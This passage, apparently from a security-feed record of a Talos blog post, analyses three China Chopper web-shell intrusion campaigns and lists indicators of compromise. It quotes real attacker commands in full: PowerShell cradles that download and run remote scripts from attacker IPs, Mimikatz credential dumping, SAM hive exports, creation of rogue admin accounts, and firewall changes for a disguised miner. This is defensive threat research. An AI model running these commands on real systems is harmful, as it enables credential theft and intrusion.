-enc -iex(New-Object Net.WebClient).DownloadString('hxxp://78.155.201[.]168:8667/6HqJB0SPQqbFbHJD/init.ps1')\n\n \nHere's a look at the miner configuration: \n \n\n\n[](<https://1.bp.blogspot.com/-HA_kY6CQEW0/XVF7tCD8FkI/AAAAAAAAAT0/oHnijHOyXFs3MVzen70IygrDQay3g_5VgCLcBGAs/s1600/image1.png>)\n\n_Monero miner configuration_\n\n \nSome of the detected activity may have been manual and performed in order to get OS credentials. 
\n \nTrying to get the registry: \n \n\n \n \n reg save hklm\\sam sam.hive \n reg save hklm\\system system.hive \n reg save hklm\\security security.hive\n\n \nUsing Mimikatz (with a few hiccups along the way): \n \n\n \n \n powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz >>c:\\1.txt\n\n \n\n \n \n powershell IEX\",\"(New-Object\",\"Net.WebClient).DownloadString('hxxp://is[.]gd/oeoFuI'); Invoke-Mimikatz -DumpCreds\n\n \n\n \n \n C:\\Windows\\System32WindowsPowerShell\\v1.0\\powershell.exe IEX \n \n (New-Object\",\"Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz\n\n \n\n \n \n C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe [Environment]::Is64BitProcess\n\n \n\n \n \n powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); \n Invoke-Mimikatz >>c:\\1.txt\n\n \nAttempting to dump password hashes using a PowerShell module and the command line: \n \n\n \n \n IEX (New-Object \n \n Net.WebClient).DownloadString('https://raw.githubusercontent.com/klionsec/CommonTools/master/Get-PassHashes.ps1');Get-PassHashes;\n\n \nThe attackers also tried procdump64.exe on lsass.exe to get the local credentials stored in memory. In addition to the multiple attempts to dump the credential, the attackers had to deal with typos: missed spaces, wrong commands or letters switching. \n \nOne of the actors successfully acquired the credentials and tried to pivot internally by using the credentials and the \"net use\" commands. 
\n \nFinally, several remote access tools such as [Gh0stRAT](<https://blog.talosintelligence.com/2019/06/threat-roundup-0607-0614.html>) and Venom multi-hop proxy were deployed on the machine, as well as a remote shell written purely in PowerShell. \n \n\n\n### Case No. 3: Web hosting providers compromised\n\nIn one campaign, we discovered an Asian web-hosting provider under attack, with the most significant compromise spanning several Windows servers over a period of 10 months. Once again, we cannot be sure if this was a single actor or multiple groups, since the activities differ depending on the attacked server. We show just a subset of observed activities. \n\n\n#### Server 1\n\nGenerally, the attackers seek to create a new user and then add the user to the group of users with administrative privileges, presumably to access and modify other web applications hosted on a single physical server. \n \n\n \n \n cd /d C:\\compromisedappdirectory&net user user pass /add \n cd /d C:\\compromisedappdirectory&net localgroup administrattors user /add\n\n \nNotice the misspelling of the word \"administrators.\" The actor realizes that the addition of the user was not successful and attempts a different technique. They download and install an archive containing executables and trivially modified source code of the password-stealing tool \"[Mimikatz Lite](<https://github.com/infosecsmith/MimikatzLite>)\" as GetPassword.exe. \n \nThe tool investigates the Local Security Authority Subsystem memory space in order to find, decrypt and display retrieved passwords. The only change, compared with the original tool is that actors change the color and the code page of the command window. The color is changed so that green text is displayed on a black background and the active console code page is changed to the Chinese code page 936. \n \nFinally, the actor attempts to dump the database of a popular mobile game \"Clash of Kings,\" possibly hosted on a private server. 
\n\n\n#### Server 2\n\nAn actor successfully tested China Chopper on a second server and stopped the activity. However, we also found another Monero cryptocurrency miner just as we found commodity malware on other systems compromised with China Chopper. \n \nThe actors first reset the Access Control List for the Windows temporary files folder and take ownership of the folder. They then allow the miner executable through the Windows Firewall and finally launch the mining payload. \n \n\n \n \n C:\\Windows\\system32\\icacls.exe C:\\Windows\\Temp /Reset /T \n C:\\Windows\\system32\\takeown.exe /F C:\\Windows\\Temp \n C:\\Windows\\system32\\netsh.exe Firewall Add AllowedProgram C:\\Windows\\Temp\\lsass.eXe Windows Update Enable \n C:\\Windows\\Temp\\lsass.eXe\n\n#### Server 3\n\nThe attack on this server starts by downloading a number of public and private tools, though we were not able to retrieve them. \n \nThe actor attempts to exploit [CVE-2018\u20138440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>) \u2014 an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call \u2014 to elevate the privileges using a modified [proof-of-concept exploit](<https://github.com/GossiTheDog/zeroday>). \n \n\n \n \n cd /d C:\\directoryofcompromisedapp&rundll32 C:\\directoryofcompromisedapp\\ALPC-TaskSched-LPE.dll,a\n\n \nThe attacker launches several custom tools and an available tool that attempts to create a new user iis_uses and change DACLs to allow the users to modify certain operating system objects. \n \nThe attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server. This is likely done to compromise other sites or to run a web defacement campaign. \n \n\n \n \n cacls \\. 
C:\\path_to_a_website /T /E /C /G Everyone:F\n\n \nFinally, the actor attempts to launch Powershell Mimikatz loader to get more credentials from memory and save the credentials into a text file: \n \n\n \n \n powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz|Out-File \n -Encoding ASCII outputfile.txt\n\n \n\n\n#### Server 4\n\nThe China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities [CVE-2015-0062](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2015-0062>), [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name%3DCVE-2015-1701>) and [CVE-2016-0099](<https://www.cvedetails.com/cve/CVE-2016-0099/>) to allow the attacker to modify other objects on the server. \n \nOnce the privilege escalation was successful, the actor adds a new user account and adds the account to the administrative group. \n \n\n \n \n net user admin admin /ad \n net localgroup administrators admin /ad\n\n \nThe attacker next logs on to the server with a newly created user account and launches a free tool replacestudio32.exe, a GUI utility that easily searches through text-based files and performs replacement with another string. Once again, this could be used to affect all sites hosted on the server or simply deface pages. \n \n\n\n### Conclusion\n\nInsecure web applications provide an effective entry point for attackers and allow them to install additional tools such as web shells, conduct reconnaissance and pivot to other systems. \n \nAlthough China Chopper is an old tool, we still see it being used by attackers with various goals and skill levels and in this post we showed some of the common tools, techniques and processes employed in three separate breaches. 
Because it is so easy to use, it's impossible to confidently connect it to any particular actor or group. \n \nIn our research we documented three separate campaigns active over a period of several months. This corroborates the claim that an average time to detect an intrusion is [over 180 day](<https://www.cisco.com/c/m/en_uk/campaigns/breach-readiness-and-response/index.html>)s and implies that defenders should approach building their security teams and processes around an assumption that the organization has already been breached. It is crucial that an incident response team should have a permission to proactively hunt for breaches, not only to respond to alerts raised by automated detection systems or escalated by the first line security analysts. \n \nWhen securing the infrastructure it is important to keep internal as well as external facing web servers, applications, and frameworks up to date with the latest security patches to mitigate risk of compromise with already known exploits. \n \nDespite the age, China Chopper is here to stay, and we will likely see it in the wild going forward. \n \n\n\n## Coverage\n\nIntrusion prevention systems such as [SNORT\u00ae](<https://snort.org/>) provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as [Cisco AMP for Endpoints](<https://www.cisco.com/c/en/us/products/security/amp-for-endpoints/index.html>), which gives users the ability to track process invocation and inspect processes. Try AMP for free [here](<http://cisco.com/go/tryamp>). \n \nAdditional ways our customers can detect and block these threats are listed below. 
\n \n\n\n[](<https://1.bp.blogspot.com/-yUCBqjJUM8M/XVF7-jm_JLI/AAAAAAAAAT8/hhCfba_JHMUia21PuHBNSgH416W1Gc9KwCLcBGAs/s1600/image6.png>)\n\n \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ ](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)[Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \n[Email Security](<https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html>) can block malicious emails sent by threat actors as part of their campaign. \n \nNetwork Security appliances such as[ ](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)[Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). 
\n \n\n\n## IOCs\n\n### China Chopper clients\n\n9065755708be18d538ae1698b98201a63f735e3d8a597419588a16b0a72c249a \nc5bbb7644aeaadc69920de9a31042920add12690d3a0a38af15c8c76a90605ef \nb84cdf5f8a4ce4492dd743cb473b1efe938e453e43cdd4b4a9c1c15878451d07 \n58b2590a5c5a7bf19f6f6a3baa6b9a05579be1ece224fccd2bfa61224a1d6abc \n \n\n\n### Case study 1\n\n#### Files\n\nb1785560ad4f5f5e8c62df16385840b1248fe1be153edd0b1059db2308811048 - downloader \nfe6b06656817e288c2a391cbe8f5c7f1fa0f0849d9446f9350adf7100aa7b447 - proxy \n28cbc47fe2975fbde7662e56328864e28fe6de4b685d407ad8a2726ad92b79e5 - downloader dll \nc9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e - nbtscan tool \ndbe8ada2976ee00876c8d61e5a92cf9c980ae4b3fce1d9016456105a2680776c - Miner \n\n\n#### Legitimate tools\n\nd76c3d9bb0d8e0152db37bcfe568c5b9a4cac00dd9c77c2f607950bbd25b30e0 - rar \n46c3e073daa4aba552f553b914414b8d4419367df63df8a0d2cf4db2d835cdbd - renamed rar \n96f478f709f4f104822b441ae3fa82c95399677bf433ac1a734665f374d28c84 - renamed rar \n\n\n#### IP addresses\n\n69.165.64.100 \n59.188.255.184 \n154.211.12.153 \n185.234.218.248 \n\n\n### Case study 2\n\n#### Files\n\n02d635f9dfc80bbd9e8310606f68120d066cec7db8b8f28e19b3ccb9f4727570 - Gandcrab loader \n1c3d492498d019eabd539a0774adfc740ab62ef0e2f11d13be4c00635dccde33 - Gandcrab \n219644f3ece78667293a035daf7449841573e807349b88eb24e2ba6ccbc70a96 - Miner/dropper \n4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38 - massscan dropped by the miner \na06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb - remote exploit \n919270ef1c58cc032bb3417a992cbb676eb15692f16e608dcac48e536271373a - multihop Venom proxy \n\n\n#### URLs\n\nhxxp://101.78.142.74:8001/xavg/javae[.]exe \nhxxp://107.181.160.197/win/3p/checking[.]ps1 \nhxxp://107.182.28.64/t0[.]txt \nhxxp://139.180.199.167:1012/update[.]ps1 \nhxxp://172.96.241.10:80/a \nhxxp://185.228.83.51/config[.]c \nhxxp://188.166.74.218/radm[.]exe \nhxxp://188.166.74.218/untitled[.]exe 
\nhxxp://198.13.42.229:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://202.144.193.177/1[.]ps1 \nhxxp://43.245.222.57:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://78.155.201.168:8667/6HqJB0SPQqbFbHJD/init[.]ps1 \nhxxp://is.gd/oeoFuI \nhxxps://pastebin.com/raw/Hd7BmJ33 \nhxxps://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz[.]ps1 \nhxxp://fid.hognoob.se/download[.]exe \nhxxp://107.182.28.64/t0[.]txt \nhxxp://uio.hognoob.se:63145/cfg[.]ini \nhxxp://fid.hognoob.se/HidregSvc[.]exe \nhxxp://188.166.74.218/untitled[.]exe \nhxxp://45.55.211.79/.cache/untitled[.]exe \nhxxp://188.166.74.218/untitled[.]exe \n \n\n\n#### IP Addresses\n\n185.234.218.248 \n \n\n\n### Case study 3\n\n#### Files:\n\nfe2f0494e70bfa872f1aea3ec001ad924dd868e3621735c5a6c2e9511be0f4b0 - Mini Mimikatz archive \n2e0a9986214c4da41030aca337f720e63594a75754e46390b6f81bae656c2481 - CVE-2015-0062 \nf3a869c78bb01da794c30634383756698e320e4ca3f42ed165b4356fa52b2c32 - CVE-2015-1701/CVE-2016-0099 \nb46080a2446c326cc5f574bdd34e20daad169b535adfda97ba83f31a1d0ec9ab - a tool for adding and elevating a user \nab06f0445701476a3ad1544fbea8882c6cb92da4add72dc741000bc369db853f - ACLs editing for defaced sites \n\n\n#### Legitimate Tools:\n\nee31b75be4005290f2a9098c04e0c7d0e7e07a7c9ea1a01e4c756c0b7a342374 - Replace Studio \nd1c67e476cfca6ade8c79ac7fd466bbabe3b2b133cdac9eacf114741b15d8802 - part of Replace Studio \n \n", "modified": "2019-08-27T08:14:42", "published": "2019-08-27T08:14:42", "id": "TALOSBLOG:62B868C1729207FF4ED156D86237FD03", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/woKZ9ObRF9g/china-chopper-still-active-9-years-later.html", "type": "talosblog", "title": "China Chopper still active 9 years later", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}